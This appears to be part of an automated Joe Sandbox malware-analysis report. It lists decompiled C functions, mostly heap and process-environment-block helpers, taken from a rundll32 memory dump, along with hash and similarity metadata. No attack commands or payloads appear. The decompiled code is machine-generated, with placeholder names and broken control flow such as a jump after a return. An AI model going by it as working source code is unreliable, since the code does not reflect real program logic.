                                                                                            				if(__ecx == 0 ||  *((char*)(__ecx + 0xdd)) != 0 || E045FC5D5(__ecx, _t19) == 0 ||  *((intOrPtr*)(__ecx + 4)) != 0x45b11cc ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
                                                                                            					__eflags = _a4;
                                                                                            					if(__eflags != 0) {
                                                                                            						L10:
                                                                                            						E046A88F5(_t17, _t18, _t19, _t20, _t21, __eflags);
                                                                                            						L9:
                                                                                            						return 0;
                                                                                            					}
                                                                                            					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
                                                                                            					if(__eflags == 0) {
                                                                                            						goto L10;
                                                                                            					}
                                                                                            					goto L9;
                                                                                            				} else {
                                                                                            					return 1;
                                                                                            				}
                                                                                            			}










                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmp
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • Opcode ID: ac3e7d363c2a2f2f4b3b60fba299d69d89f70032ecde3aa65d265fae3da82ce3
                                                                                            • Instruction ID: 72bb8e237ad6a6ab802310280cc10e31224beca8215c1bfcaa2b776cd2a82b82
                                                                                            • Opcode Fuzzy Hash: ac3e7d363c2a2f2f4b3b60fba299d69d89f70032ecde3aa65d265fae3da82ce3
                                                                                            • Instruction Fuzzy Hash: F2F0B4B2D166AC9FE733DB64E804B227BD4BB06774F444877D60587202D6A4FC80E653
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 94%
                                                                                            			E04692073(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
                                                                                            				void* __esi;
                                                                                            				signed char _t3;
                                                                                            				signed char _t7;
                                                                                            				void* _t19;
                                                                                            
                                                                                            				_t17 = __ecx;
                                                                                            				_t3 = E0468FD22(__ecx);
                                                                                            				_t19 =  *0x46c849c - _t3; // 0x0
                                                                                            				if(_t19 == 0) {
                                                                                            					__eflags = _t17 -  *0x46c8748; // 0x0
                                                                                            					if(__eflags <= 0) {
                                                                                            						E04691C06();
                                                                                            						_t3 =  *((intOrPtr*)( *[fs:0x30] + 2));
                                                                                            						__eflags = _t3;
                                                                                            						if(_t3 != 0) {
                                                                                            							L5:
                                                                                            							__eflags =  *0x46c8724 & 0x00000004;
                                                                                            							if(( *0x46c8724 & 0x00000004) == 0) {
                                                                                            								asm("int3");
                                                                                            								return _t3;
                                                                                            							}
                                                                                            						} else {
                                                                                            							_t3 =  *0x7ffe02d4 & 0x00000003;
                                                                                            							__eflags = _t3 - 3;
                                                                                            							if(_t3 == 3) {
                                                                                            								goto L5;
                                                                                            							}
                                                                                            						}
                                                                                            					}
                                                                                            					return _t3;
                                                                                            				} else {
                                                                                            					_t7 =  *0x46c8724; // 0x0
                                                                                            					return E04688DF1(__ebx, 0xc0000374, 0x46c5890, __edi, __ecx,  !_t7 >> 0x00000002 & 0x00000001,  !_t7 >> 0x00000002 & 0x00000001);
                                                                                            				}
                                                                                            			}








                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmp
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • Opcode ID: b2775e2b7955a173f1a8547d6e551bf44c911cace3841511afe959d07a360ece
                                                                                            • Instruction ID: 3464c5148d75c4314728e6943da06092495f0c3bc37df115e773f44cffe65ddd
                                                                                            • Opcode Fuzzy Hash: b2775e2b7955a173f1a8547d6e551bf44c911cace3841511afe959d07a360ece
                                                                                            • Instruction Fuzzy Hash: ADF02766411294BAEF327F25A1242F62BC8C795114B0928CAD45017300F4BDBC83CA34
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 43%
                                                                                            			E046A8D34(intOrPtr __ecx, intOrPtr __edx) {
                                                                                            				signed int _v8;
                                                                                            				intOrPtr _v12;
                                                                                            				intOrPtr _v16;
                                                                                            				short _v42;
                                                                                            				char _v48;
                                                                                            				signed char* _t12;
                                                                                            				intOrPtr _t18;
                                                                                            				intOrPtr _t24;
                                                                                            				intOrPtr _t25;
                                                                                            				signed int _t26;
                                                                                            
                                                                                            				_t23 = __edx;
                                                                                            				_v8 =  *0x46cd360 ^ _t26;
                                                                                            				_v16 = __ecx;
                                                                                            				_v42 = 0x1c2b;
                                                                                            				_v12 = __edx;
                                                                                            				if(E045F7D50() == 0) {
                                                                                            					_t12 = 0x7ffe0386;
                                                                                            				} else {
                                                                                            					_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                                                            				}
                                                                                            				_push( &_v48);
                                                                                            				_push(8);
                                                                                            				_push(0x20402);
                                                                                            				_push( *_t12 & 0x000000ff);
                                                                                            				return E0461B640(E04619AE0(), _t18, _v8 ^ _t26, _t23, _t24, _t25);
                                                                                            			}













                                                                                            Similarity
                                                                                            • Opcode ID: 39afc86c30b69f0902341e7db425490e96749d18b7ec9e43024c84d37fed4862
                                                                                            • Instruction ID: 59a30bab355b78982dbfa06acbb6f69608862c527b6946478946ca49b3c60505
                                                                                            • Opcode Fuzzy Hash: 39afc86c30b69f0902341e7db425490e96749d18b7ec9e43024c84d37fed4862
                                                                                            • Instruction Fuzzy Hash: 4CF09070A04608AFD704EBA8D441A6E77B4EB18700F5080AAE905EB290EA38E900CB94
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 54%
                                                                                            			E0461927A(void* __ecx) {
                                                                                            				signed int _t11;
                                                                                            				void* _t14;
                                                                                            
                                                                                            				_t11 = L045F4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x98);
                                                                                            				if(_t11 != 0) {
                                                                                            					E0461FA60(_t11, 0, 0x98);
                                                                                            					asm("movsd");
                                                                                            					asm("movsd");
                                                                                            					asm("movsd");
                                                                                            					asm("movsd");
                                                                                            					 *(_t11 + 0x1c) =  *(_t11 + 0x1c) & 0x00000000;
                                                                                            					 *((intOrPtr*)(_t11 + 0x24)) = 1;
                                                                                            					E046192C6(_t11, _t14);
                                                                                            				}
                                                                                            				return _t11;
                                                                                            			}





                                                                                            Similarity
                                                                                            • Opcode ID: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                                                                            • Instruction ID: 611bc891e145fc8dfe82f6319e06133f8fcfaa7df1b2c850147a2b21cc287815
                                                                                            • Opcode Fuzzy Hash: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                                                                            • Instruction Fuzzy Hash: FFE0ED722406406BEB219E0ACC80B0336A9AF82724F08407DB9041E292CAEAE908C7A4
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 88%
                                                                                            			E045F746D(short* __ebx, void* __ecx, void* __edi, intOrPtr __esi) {
                                                                                            				signed int _t8;
                                                                                            				void* _t10;
                                                                                            				short* _t17;
                                                                                            				void* _t19;
                                                                                            				intOrPtr _t20;
                                                                                            				void* _t21;
                                                                                            
                                                                                            				_t20 = __esi;
                                                                                            				_t19 = __edi;
                                                                                            				_t17 = __ebx;
                                                                                            				if( *((char*)(_t21 - 0x25)) != 0) {
                                                                                            					if(__ecx == 0) {
                                                                                            						E045EEB70(__ecx, 0x46c79a0);
                                                                                            					} else {
                                                                                            						asm("lock xadd [ecx], eax");
                                                                                            						if((_t8 | 0xffffffff) == 0) {
                                                                                            							_push( *((intOrPtr*)(__ecx + 4)));
                                                                                            							E046195D0();
                                                                                            							L045F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t21 - 0x50)));
                                                                                            							_t17 =  *((intOrPtr*)(_t21 - 0x2c));
                                                                                            							_t20 =  *((intOrPtr*)(_t21 - 0x3c));
                                                                                            						}
                                                                                            					}
                                                                                            					L10:
                                                                                            				}
                                                                                            				_t10 = _t19 + _t19;
                                                                                            				if(_t20 >= _t10) {
                                                                                            					if(_t19 != 0) {
                                                                                            						 *_t17 = 0;
                                                                                            						return 0;
                                                                                            					}
                                                                                            				}
                                                                                            				return _t10;
                                                                                            				goto L10;
                                                                                            			}









                                                                                            Similarity
                                                                                            • Opcode ID: fb5afd4b394d04503cd7463d9ab60fc993d332e41c6fb27cfdeddeefed75235e
                                                                                            • Instruction ID: 8cd779930bdcffa7401ce8d540775c30972b41774f0341d29f0157b861ece5d5
                                                                                            • Opcode Fuzzy Hash: fb5afd4b394d04503cd7463d9ab60fc993d332e41c6fb27cfdeddeefed75235e
                                                                                            • Instruction Fuzzy Hash: 47F0E934A00145AADF059B68CC44F797FB1BF0C358F040E99D651A7160F725B802EB97
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 36%
                                                                                            			E046A8CD6(intOrPtr __ecx) {
                                                                                            				signed int _v8;
                                                                                            				intOrPtr _v12;
                                                                                            				short _v38;
                                                                                            				char _v44;
                                                                                            				signed char* _t11;
                                                                                            				intOrPtr _t17;
                                                                                            				intOrPtr _t22;
                                                                                            				intOrPtr _t23;
                                                                                            				intOrPtr _t24;
                                                                                            				signed int _t25;
                                                                                            
                                                                                            				_v8 =  *0x46cd360 ^ _t25;
                                                                                            				_v12 = __ecx;
                                                                                            				_v38 = 0x1c2d;
                                                                                            				if(E045F7D50() == 0) {
                                                                                            					_t11 = 0x7ffe0386;
                                                                                            				} else {
                                                                                            					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                                                            				}
                                                                                            				_push( &_v44);
                                                                                            				_push(0xffffffe4);
                                                                                            				_push(0x402);
                                                                                            				_push( *_t11 & 0x000000ff);
                                                                                            				return E0461B640(E04619AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
                                                                                            			}













                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 58f477aa0f11cbda842cb5797754f52a00de4c012d76e3efb3c8d841312cdd68
                                                                                            • Instruction ID: aa5eea7a2a7ddf9145335601db72a389aee8b0c40c4da9905f1be64c60a68df3
                                                                                            • Opcode Fuzzy Hash: 58f477aa0f11cbda842cb5797754f52a00de4c012d76e3efb3c8d841312cdd68
                                                                                            • Instruction Fuzzy Hash: CFF0E270A04608ABDB00EBA8D845E6E77B4EF18304F14019AE906EB390FA38ED00CB58
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 36%
                                                                                            			E046A8B58(intOrPtr __ecx) {
                                                                                            				signed int _v8;
                                                                                            				intOrPtr _v20;
                                                                                            				short _v46;
                                                                                            				char _v52;
                                                                                            				signed char* _t11;
                                                                                            				intOrPtr _t17;
                                                                                            				intOrPtr _t22;
                                                                                            				intOrPtr _t23;
                                                                                            				intOrPtr _t24;
                                                                                            				signed int _t25;
                                                                                            
                                                                                            				_v8 =  *0x46cd360 ^ _t25;
                                                                                            				_v20 = __ecx;
                                                                                            				_v46 = 0x1c26;
                                                                                            				if(E045F7D50() == 0) {
                                                                                            					_t11 = 0x7ffe0386;
                                                                                            				} else {
                                                                                            					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                                                            				}
                                                                                            				_push( &_v52);
                                                                                            				_push(4);
                                                                                            				_push(0x402);
                                                                                            				_push( *_t11 & 0x000000ff);
                                                                                            				return E0461B640(E04619AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
                                                                                            			}













                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmp
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd

                                                                                            C-Code - Quality: 100%
                                                                                            			E045D4F2E(void* __ecx, char _a4) {
                                                                                            				void* __esi;
                                                                                            				void* __ebp;
                                                                                            				void* _t17;
                                                                                            				void* _t19;
                                                                                            				void* _t20;
                                                                                            				void* _t21;
                                                                                            
                                                                                            				_t18 = __ecx;
                                                                                            				_t21 = __ecx;
                                                                                            				if(__ecx == 0) {
                                                                                            					L6:
                                                                                            					__eflags = _a4;
                                                                                            					if(__eflags != 0) {
                                                                                            						L8:
                                                                                            						E046A88F5(_t17, _t18, _t19, _t20, _t21, __eflags);
                                                                                            						L9:
                                                                                            						return 0;
                                                                                            					}
                                                                                            					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
                                                                                            					if(__eflags != 0) {
                                                                                            						goto L9;
                                                                                            					}
                                                                                            					goto L8;
                                                                                            				}
                                                                                            				_t18 = __ecx + 0x30;
                                                                                            				if(E045FC5D5(__ecx + 0x30, _t19) == 0 ||  *((intOrPtr*)(__ecx + 0x34)) != 0x45b1030 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
                                                                                            					goto L6;
                                                                                            				} else {
                                                                                            					return 1;
                                                                                            				}
                                                                                            			}









                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmp
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd

                                                                                            C-Code - Quality: 100%
                                                                                            			E0460A44B(signed int __ecx) {
                                                                                            				intOrPtr _t13;
                                                                                            				signed int _t15;
                                                                                            				signed int* _t16;
                                                                                            				signed int* _t17;
                                                                                            
                                                                                            				_t13 =  *0x46c7b9c; // 0x0
                                                                                            				_t15 = __ecx;
                                                                                            				_t16 = L045F4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13 + 0xc0000, 8 + __ecx * 4);
                                                                                            				if(_t16 == 0) {
                                                                                            					return 0;
                                                                                            				}
                                                                                            				 *_t16 = _t15;
                                                                                            				_t17 =  &(_t16[2]);
                                                                                            				E0461FA60(_t17, 0, _t15 << 2);
                                                                                            				return _t17;
                                                                                            			}







                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmp
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd

                                                                                            C-Code - Quality: 79%
                                                                                            			E045DF358(void* __ecx, signed int __edx) {
                                                                                            				char _v8;
                                                                                            				signed int _t9;
                                                                                            				void* _t20;
                                                                                            
                                                                                            				_push(__ecx);
                                                                                            				_t9 = 2;
                                                                                            				_t20 = 0;
                                                                                            				if(E0460F3D5( &_v8, _t9 * __edx, _t9 * __edx >> 0x20) >= 0 && _v8 != 0) {
                                                                                            					_t20 = L045F4620( &_v8,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
                                                                                            				}
                                                                                            				return _t20;
                                                                                            			}






                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmp
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd

                                                                                            C-Code - Quality: 100%
                                                                                            			E045EFF60(intOrPtr _a4) {
                                                                                            				void* __ecx;
                                                                                            				void* __ebp;
                                                                                            				void* _t13;
                                                                                            				intOrPtr _t14;
                                                                                            				void* _t15;
                                                                                            				void* _t16;
                                                                                            				void* _t17;
                                                                                            
                                                                                            				_t14 = _a4;
                                                                                            				if(_t14 == 0 || ( *(_t14 + 0x68) & 0x00030000) != 0 ||  *((intOrPtr*)(_t14 + 4)) != 0x45b11a4 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
                                                                                            					return E046A88F5(_t13, _t14, _t15, _t16, _t17, __eflags);
                                                                                            				} else {
                                                                                            					return E045F0050(_t14);
                                                                                            				}
                                                                                            			}










                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmp
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd

                                                                                            C-Code - Quality: 82%
                                                                                            			E046641E8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                            				void* _t5;
                                                                                            				void* _t14;
                                                                                            
                                                                                            				_push(8);
                                                                                            				_push(0x46b08f0);
                                                                                            				_t5 = E0462D08C(__ebx, __edi, __esi);
                                                                                            				if( *0x46c87ec == 0) {
                                                                                            					E045EEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                                                                            					 *(_t14 - 4) =  *(_t14 - 4) & 0x00000000;
                                                                                            					if( *0x46c87ec == 0) {
                                                                                            						 *0x46c87f0 = 0x46c87ec;
                                                                                            						 *0x46c87ec = 0x46c87ec;
                                                                                            						 *0x46c87e8 = 0x46c87e4;
                                                                                            						 *0x46c87e4 = 0x46c87e4;
                                                                                            					}
                                                                                            					 *(_t14 - 4) = 0xfffffffe;
                                                                                            					_t5 = L04664248();
                                                                                            				}
                                                                                            				return E0462D0D1(_t5);
                                                                                            			}






                                                                                            C-Code - Quality: 100%
                                                                                            			E0468D380(void* __ecx, void* __edx, intOrPtr _a4) {
                                                                                            				void* _t5;
                                                                                            
                                                                                            				if(_a4 != 0) {
                                                                                            					_t5 = L045DE8B0(__ecx, _a4, 0xfff);
                                                                                            					L045F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
                                                                                            					return _t5;
                                                                                            				}
                                                                                            				return 0xc000000d;
                                                                                            			}





                                                                                            C-Code - Quality: 100%
                                                                                            			E0460A185() {
                                                                                            				void* __ecx;
                                                                                            				intOrPtr* _t5;
                                                                                            
                                                                                            				if( *0x46c67e4 >= 0xa) {
                                                                                            					if(_t5 < 0x46c6800 || _t5 >= 0x46c6900) {
                                                                                            						return L045F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t5);
                                                                                            					} else {
                                                                                            						goto L1;
                                                                                            					}
                                                                                            				} else {
                                                                                            					L1:
                                                                                            					return E045F0010(0x46c67e0, _t5);
                                                                                            				}
                                                                                            			}






                                                                                            C-Code - Quality: 100%
                                                                                            			E046016E0(void* __edx, void* __eflags) {
                                                                                            				void* __ecx;
                                                                                            				void* _t3;
                                                                                            
                                                                                            				_t3 = E04601710(0x46c67e0);
                                                                                            				if(_t3 == 0) {
                                                                                            					_t6 =  *[fs:0x30];
                                                                                            					if( *((intOrPtr*)( *[fs:0x30] + 0x18)) == 0) {
                                                                                            						goto L1;
                                                                                            					} else {
                                                                                            						return L045F4620(_t6,  *((intOrPtr*)(_t6 + 0x18)), 0, 0x20);
                                                                                            					}
                                                                                            				} else {
                                                                                            					L1:
                                                                                            					return _t3;
                                                                                            				}
                                                                                            			}






                                                                                            C-Code - Quality: 100%
                                                                                            			E046553CA(void* __ebx) {
                                                                                            				intOrPtr _t7;
                                                                                            				void* _t13;
                                                                                            				void* _t14;
                                                                                            				intOrPtr _t15;
                                                                                            				void* _t16;
                                                                                            
                                                                                            				_t13 = __ebx;
                                                                                            				if( *((char*)(_t16 - 0x65)) != 0) {
                                                                                            					E045EEB70(_t14,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                                                                            					_t7 =  *((intOrPtr*)(_t16 - 0x64));
                                                                                            					_t15 =  *((intOrPtr*)(_t16 - 0x6c));
                                                                                            				}
                                                                                            				if(_t15 != 0) {
                                                                                            					L045F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13, _t15);
                                                                                            					return  *((intOrPtr*)(_t16 - 0x64));
                                                                                            				}
                                                                                            				return _t7;
                                                                                            			}









                                                                                            C-Code - Quality: 100%
                                                                                            			E046035A1(void* __eax, void* __ebx, void* __ecx) {
                                                                                            				void* _t6;
                                                                                            				void* _t10;
                                                                                            				void* _t11;
                                                                                            
                                                                                            				_t10 = __ecx;
                                                                                            				_t6 = __eax;
                                                                                            				if( *((intOrPtr*)(_t11 - 0x34)) >= 0 && __ebx != 0) {
                                                                                            					 *((intOrPtr*)(__ecx + 0x294)) =  *((intOrPtr*)(__ecx + 0x294)) + 1;
                                                                                            				}
                                                                                            				if( *((char*)(_t11 - 0x1a)) != 0) {
                                                                                            					return E045EEB70(_t10,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                                                                            				}
                                                                                            				return _t6;
                                                                                            			}







                                                                                            C-Code - Quality: 100%
                                                                                            			E045EAAB0() {
                                                                                            				intOrPtr* _t4;
                                                                                            
                                                                                            				_t4 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
                                                                                            				if(_t4 != 0) {
                                                                                            					if( *_t4 == 0) {
                                                                                            						goto L1;
                                                                                            					} else {
                                                                                            						return  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x1e;
                                                                                            					}
                                                                                            				} else {
                                                                                            					L1:
                                                                                            					return 0x7ffe0030;
                                                                                            				}
                                                                                            			}





                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmp
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                                                                            • Instruction ID: 63e7e5b9202fcf1cce7cb5482d7e2a96f21ff1389fc4279cad1878bcdc8c956c
                                                                                            • Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                                                                            • Instruction Fuzzy Hash: 6ED0E935352A80CFD71ACF5DC954B1573A4BB44B45FC50490E541CBB62E62CED54DA00
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 100%
                                                                                            			E0465A537(intOrPtr _a4, intOrPtr _a8) {
                                                                                            
                                                                                            				return L045F8E10( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a8, _a4);
                                                                                            			}



                                                                                            0x0465a553

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmp
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                                                                            • Instruction ID: 111ba71ab00b79db5ca0aa25a3585a17150ac96f001f3b2d6970a8f7559e8a0c
                                                                                            • Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                                                                            • Instruction Fuzzy Hash: D2C01232080648BBCB126E81CC00F067B2AFB94B60F008010BA080A5608632E970EA84
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 100%
                                                                                            			E045DDB40() {
                                                                                            				signed int* _t3;
                                                                                            				void* _t5;
                                                                                            
                                                                                            				_t3 = L045F4620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x64);
                                                                                            				if(_t3 == 0) {
                                                                                            					return 0;
                                                                                            				} else {
                                                                                            					 *_t3 =  *_t3 | 0x00000400;
                                                                                            					return _t3;
                                                                                            				}
                                                                                            			}






                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmp
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                                                                            • Instruction ID: 72bf8e6c51874f288d528cd73cfea4710dc133b8c372cd0a722ded007af33cfe
                                                                                            • Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                                                                            • Instruction Fuzzy Hash: A5C08C30280A41ABFB321F20CD01B0136A0BF51B49F4400A06300DA0F0DB78E901FA00
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 100%
                                                                                            			E045DAD30(intOrPtr _a4) {
                                                                                            
                                                                                            				return L045F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
                                                                                            			}



                                                                                            0x045dad49

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmp
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                                                                            • Instruction ID: 35c651e9ba464c1b043c56c6c04c7720ce301689744cb87a7e2fb90fd0c471c5
                                                                                            • Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                                                                            • Instruction Fuzzy Hash: BEC08C32080648BBC7126A45CD00F017B29E794B60F000020B6040A661C932F861E588
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 100%
                                                                                            			E045F3A1C(intOrPtr _a4) {
                                                                                            				void* _t5;
                                                                                            
                                                                                            				return L045F4620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
                                                                                            			}




                                                                                            0x045f3a35

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmp
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                                                                            • Instruction ID: 34274488eb7ad575b650dd69a6cccc137b359e2b32a9dc5c93711ff15b4ac3cc
